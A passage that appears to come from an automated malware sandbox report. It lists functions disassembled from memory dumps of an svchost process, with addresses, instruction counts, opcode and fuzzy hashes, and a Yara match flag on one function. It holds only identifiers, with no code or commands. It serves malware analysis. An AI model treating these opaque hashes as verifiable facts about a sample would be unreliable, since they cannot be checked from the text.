                                                                    • Instruction ID: e1e2340a3410421f8dd8261a6f8251a094379bdbec9ef6e6850f55ce31c32d8c
                                                                    • Opcode Fuzzy Hash: 7cebd6000d66b6e2583145ea99ce1f9b199878e5d8c6c694a766d0d43a5fab1b
                                                                    • Instruction Fuzzy Hash: E221AF7AA00B24AFD322EF588804B5ABFF5FBC8B54F160469EA559B341D774E811CB90
                                                                    Function 03635096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Opcode ID: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                                                    • Instruction ID: 313eca75b1d8bfdd27de6b6c42c0c0b6de4610fd30712caa0cdb8affdd155dea
                                                                    • Opcode Fuzzy Hash: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                                                    • Instruction Fuzzy Hash: E91160307096028BEB28C91D89546B6F6D9EF97264F3C852AE663CB391D773D8428780
                                                                    Function 0366E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                                                    • Instruction ID: 4a280fbc98fe7c4eea95c4e384acc1f402609275edffabcb9cca38965550c36a
                                                                    • Opcode Fuzzy Hash: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                                                    • Instruction Fuzzy Hash: AB822472F102188FCB58CFADD8916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                    Function 0367516C Relevance: .8, Instructions: 785COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                                                    • Instruction ID: d01f84273497d64d6f25ce0e25f88195a1948a6e79f2864fcc216c859a925533
                                                                    • Opcode Fuzzy Hash: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                                                    • Instruction Fuzzy Hash: 66628F3290464AAFCF24CF08D5904AEFB72BA56314B89C6DCCA9B27704D371BA55CBD1
                                                                    Function 0368739A Relevance: .7, Instructions: 705COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                                                    • Instruction ID: 9504580056d2e77c62b22c7735c85e61f7cb15c7a9476a0c4d3f9918c5fd4746
                                                                    • Opcode Fuzzy Hash: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                                                    • Instruction Fuzzy Hash: E642C275A006168FDB14DF59C580ABEF7B6FF8C314B28866DD552AB340DB34E842CBA0
                                                                    Function 03685AA0 Relevance: .7, Instructions: 652COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                    • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                    • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                    • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                    Function 0365B2C0 Relevance: .6, Instructions: 629COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 132a806aadd35a172d577bb465b46f72fce0d97659d06bdd6ab571eb0fabdf79
                                                                    • Instruction ID: f26811ab4c5d29a51d2666c36dce220d8f4b6b8078d65854eea0a04cdbbb79b6
                                                                    • Opcode Fuzzy Hash: 132a806aadd35a172d577bb465b46f72fce0d97659d06bdd6ab571eb0fabdf79
                                                                    • Instruction Fuzzy Hash: 6C32AC76E01219DBCF24DFA8C994BAEBBB5FF54714F18002AEC05AB381E7759911CB90
                                                                    Function 036F16CC Relevance: .6, Instructions: 571COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                                                    • Instruction ID: fefc5ffeb383530c5e2180fd2e312fa1d8a101aa28224aed39ba449d7aceca20
                                                                    • Opcode Fuzzy Hash: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                                                    • Instruction Fuzzy Hash: 3522D235A00216CFCB19CF59C590ABAF7B2FF8A354B28456DDA56DB344DB30E942CB90
                                                                    Function 036F1D5A Relevance: .6, Instructions: 559COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                                                    • Instruction ID: f6a95d6246a762919c9bc2b7a830d9026c456047c68e0439d7a6c1d2335a00bf
                                                                    • Opcode Fuzzy Hash: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                                                    • Instruction Fuzzy Hash: 6522A0396047128FC718CF18C5A0A2AF7E5FF89314B188A6DEA96CB355D730E846CF95
                                                                    Function 03658DBF Relevance: .6, Instructions: 554COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                                                    • Instruction ID: 4eea2e779686f4d18fae863b40b9a6ef5343e1f97b2945d1547aa2154636d119
                                                                    • Opcode Fuzzy Hash: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                                                    • Instruction Fuzzy Hash: E8222C70E0021ADBDF14CF95C5809BEFBFAAF48704F5980AAE845AB641E734D942CB64
                                                                    Function 036F2446 Relevance: .5, Instructions: 485COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                                                    • Instruction ID: 8c0abc78a8da9414d67baf34fc8c10ac618f3b6b71d50f8e6f646745f4709499
                                                                    • Opcode Fuzzy Hash: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                                                    • Instruction Fuzzy Hash: C802F1386046518FDB24CF2AC560275FBF1AF85300B18899AEAD6CF385D734E996DF60
                                                                    Function 0370B16B Relevance: .4, Instructions: 450COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                                                    • Instruction ID: f9ed8900d0aeb0feac583f280e43213b4e6b9345a3805a930769628e90632104
                                                                    • Opcode Fuzzy Hash: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                                                    • Instruction Fuzzy Hash: 96F1D572E006159BCB18CFA9C9A067EFBF5EF8821071D41ADD456DB3C1E674EA41CB90
                                                                    Function 004104E3 Relevance: .4, Instructions: 435COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                    • Instruction ID: 1eecd24a4e6a77db88770c4d53f1f1d29cda136bb14be5cb9f626c60a55da8b8
                                                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                    • Instruction Fuzzy Hash: A4026F73E547164FE720DE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                    Function 0370A9A6 Relevance: .4, Instructions: 425COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
                                                                    • Instruction ID: b1aa32e138c63196a12cec60a54d469bd11cb139553bf05c460e55cca820a912
                                                                    • Opcode Fuzzy Hash: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
                                                                    • Instruction Fuzzy Hash: 80F1A472E00626DBCB58CE68C5A15BDFBF5AF45210B1A426DD856EB3C0D734EE41CB90
                                                                    Function 03628397 Relevance: .4, Instructions: 380COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                                                    • Instruction ID: fc5695926bf62b9d70b73769767bef4fe7f839e459530ca2f36111d164f9f1ed
                                                                    • Opcode Fuzzy Hash: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                                                    • Instruction Fuzzy Hash: 74D1D475A00B269BCF14DF64CD90ABEBBA5BF48304F0A862DE815DB280E734D951CF60
                                                                    Function 0365C6E0 Relevance: .4, Instructions: 367COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                                                    • Instruction ID: 3b7e56ce361057f84eb1eda0137a8e6e57f663a650ececcc2bca19ba4394d633
                                                                    • Opcode Fuzzy Hash: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                                                    • Instruction Fuzzy Hash: 56D16D71E043198BEF28CE98C6847BDBBB5FB44304F18807AEC46AB394D7B58942DB45
                                                                    Function 036438E0 Relevance: .3, Instructions: 349COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                                                    • Instruction ID: b207525476c52080fb5963b0f7b7b0a587839f7318416a3bd6bf9320df47fb20
                                                                    • Opcode Fuzzy Hash: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                                                    • Instruction Fuzzy Hash: ECE19E75A00205CFDB18CF58C980BAAB7F5FF58310F28819AE855EB391D734EA51CB90
                                                                    Function 0364CFE0 Relevance: .3, Instructions: 345COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 287cd1c4acbb309d98da8b721ef8c94e526c49b68e608b292af005a6315e051b
                                                                    • Instruction ID: 21494e1d54f3fa5a7f6f1bc991ab6dbec104cc975d0865bb23e5cb7f729d50f8
                                                                    • Opcode Fuzzy Hash: 287cd1c4acbb309d98da8b721ef8c94e526c49b68e608b292af005a6315e051b
                                                                    • Instruction Fuzzy Hash: 61D1A330E003299FEB25DF25C994BAAF7B5AB49704F0840EDD909AB342DB74AD85CF51
                                                                    Function 0363D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                                                    • Instruction ID: 81a68c6de8afb1d907fbccfbe3fa0bd8278a453d77ebdbbaf4a87c306e508e1d
                                                                    • Opcode Fuzzy Hash: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                                                    • Instruction Fuzzy Hash: 23C19371E002159FEF25CF5AC940BAEFBB9EF55314F18826AD915AB390D770E942CB80
                                                                    Function 03640535 Relevance: .3, Instructions: 300COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                    • Instruction ID: 419b0005f14b0e3bf6aa7146815f086bd5a135973496a7311b4c7590387125fa
                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                    • Instruction Fuzzy Hash: 3BB11875A00655AFDF26DB68CA50BBEFBFAEF84200F190199D642DB381DB30D942CB50
                                                                    Function 036590DB Relevance: .3, Instructions: 287COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                                                    • Instruction ID: 4faea40c2820b22c5fcc7fac65593395a82cbd17494c5d58d54f318269d9e4d0
                                                                    • Opcode Fuzzy Hash: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                                                    • Instruction Fuzzy Hash: B4A13B75900215AFEF12EFA4CC95BAE77B9EF46750F054068FA00AF2A0D7759C10CBA4
                                                                    Function 036383C0 Relevance: .3, Instructions: 281COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                                                    • Instruction ID: bdaff764204ba1014785d391d8eb2df08658de79e0794ff7b24941d0a5606772
                                                                    • Opcode Fuzzy Hash: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                                                    • Instruction Fuzzy Hash: 09C15874108341CFDB64CF15C584BAAB7E8FF89304F54496EE9898B391D774E909CB92
                                                                    Function 03670185 Relevance: .3, Instructions: 276COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                                                    • Instruction ID: 2df9a3e8f7594e1d586e11595edcfc901b3f24a430b61e9a3bbf7f02362f5867
                                                                    • Opcode Fuzzy Hash: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                                                    • Instruction Fuzzy Hash: 28A1C275B0071ADBDB24DF69CA90BAAB7F5FF44314F544129EA059B381DB34E812CBA0
                                                                    Function 0364E3F0 Relevance: .3, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
                                                                    • Instruction ID: e879bded4ebd538b1e04037936284470d3c8512bd5666b691589c0908e484ab7
                                                                    • Opcode Fuzzy Hash: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
                                                                    • Instruction Fuzzy Hash: 02914635E002118BEB28DB28D540B7EB7E9FF84714F1944AEE8059F340E736D842C761
                                                                    Function 03631131 Relevance: .3, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3cb5f7391e0fe50eabf392035cd150940a4dbb4700d0086fa58e00fd5f0cd7d9
                                                                    • Instruction ID: 41b5a84c715f62e2c60f16e53d6b9b55c0fc937b5ccf2a5d43878836a8fcd288
                                                                    • Opcode Fuzzy Hash: 3cb5f7391e0fe50eabf392035cd150940a4dbb4700d0086fa58e00fd5f0cd7d9
                                                                    • Instruction Fuzzy Hash: C2B11275A093408FD364DF28C580A5AFBF1BB89304F184A6EF899CB352D371E945CB96
                                                                    Function 03664750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                    • Instruction ID: 94b9815d1a960a76b41378a3b9ce08b8e942fd6703b077cf29579abf751db6a8
                                                                    • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                    • Instruction Fuzzy Hash: 51815A35E047969FDB22CEADC9C026EBF55EF52280F2C467ED4428B341CA64DC86CB91
                                                                    Function 0367DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                    • Instruction ID: 58df7eb7d6f137e6ce696f83bdaef88c361c0be0a56c0375513600389175f6c5
                                                                    • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                    • Instruction Fuzzy Hash: 0E915E72620A06CFD725CF2DC985666FBE0FF55324BA88E18E4E6DB6A0D375E511CB00
                                                                    Function 036FF7B0 Relevance: .2, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 851202130379acd59c86d2f68b7f993cd87ff14a86f1856e471556738efef0cb
                                                                    • Instruction ID: b2694a7e9168e3df326d95bc7eb6a888cea653db386469314faa4d7e9f77148c
                                                                    • Opcode Fuzzy Hash: 851202130379acd59c86d2f68b7f993cd87ff14a86f1856e471556738efef0cb
                                                                    • Instruction Fuzzy Hash: A891C272E00206AFDB14CF28C9807AAB7F5AF48310F188578EA65DF395D775E951CB90
                                                                    Function 036FF43F Relevance: .2, Instructions: 241COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13072db3191975d68780cf433e347c59b2cdd669a4a35afab76843672bf2aa3d
                                                                    • Instruction ID: 8c895e4c701944a022572da94e3412ea33d8353cd91f3ee3896ca8a23fc6b787
                                                                    • Opcode Fuzzy Hash: 13072db3191975d68780cf433e347c59b2cdd669a4a35afab76843672bf2aa3d
                                                                    • Instruction Fuzzy Hash: 4C91D172A105158FCB18CF69C8916BEBBF1FF88310F19C6A9D915EB39AD634D901CB50
                                                                    Function 036F81CC Relevance: .2, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d610b0706af8bc4bb234ecae75c18eebaf8b7ba9ef6ff6dcbdc89237cefb721
                                                                    • Instruction ID: c0fc5958b7db9b03d3cbbb57b51655d97cb2fa284e41ec2f1ac4b3e7a019f1f3
                                                                    • Opcode Fuzzy Hash: 8d610b0706af8bc4bb234ecae75c18eebaf8b7ba9ef6ff6dcbdc89237cefb721
                                                                    • Instruction Fuzzy Hash: 8A81C572E006199FCB14CFA9C8805AEB7F5FF88314B1843AAD925E7384D774E952CB94
                                                                    Function 03640E59 Relevance: .2, Instructions: 231COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfcd2fae845ed1753c7806fd0dc16dce7a1da570da8912fd9aadb3cc032d8098
                                                                    • Instruction ID: a9b8d2871385d72c6a5496616e51ea7ee9702001330006b557ef07782a2fa7ad
                                                                    • Opcode Fuzzy Hash: cfcd2fae845ed1753c7806fd0dc16dce7a1da570da8912fd9aadb3cc032d8098
                                                                    • Instruction Fuzzy Hash: EB81B531E00669DFDB54CF69C9809AEFBB6FFC5210B28C2A9E9159B345D730E941CB90
                                                                    Function 036EE4F6 Relevance: .2, Instructions: 224COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6ecadc6af6f6564b5b88e0b27afa5f9d4c09e0bddbdddaaed5eaee11a3c3a22
                                                                    • Instruction ID: 624a3f2d23c98f74624a83d947d5b359e19f1fec3def24c56df4bd01eda65fcc
                                                                    • Opcode Fuzzy Hash: e6ecadc6af6f6564b5b88e0b27afa5f9d4c09e0bddbdddaaed5eaee11a3c3a22
                                                                    • Instruction Fuzzy Hash: A3819E76E012159BCB28CF98C5906ADFBF1EF88310F1981AED816EF384D7359941CB90
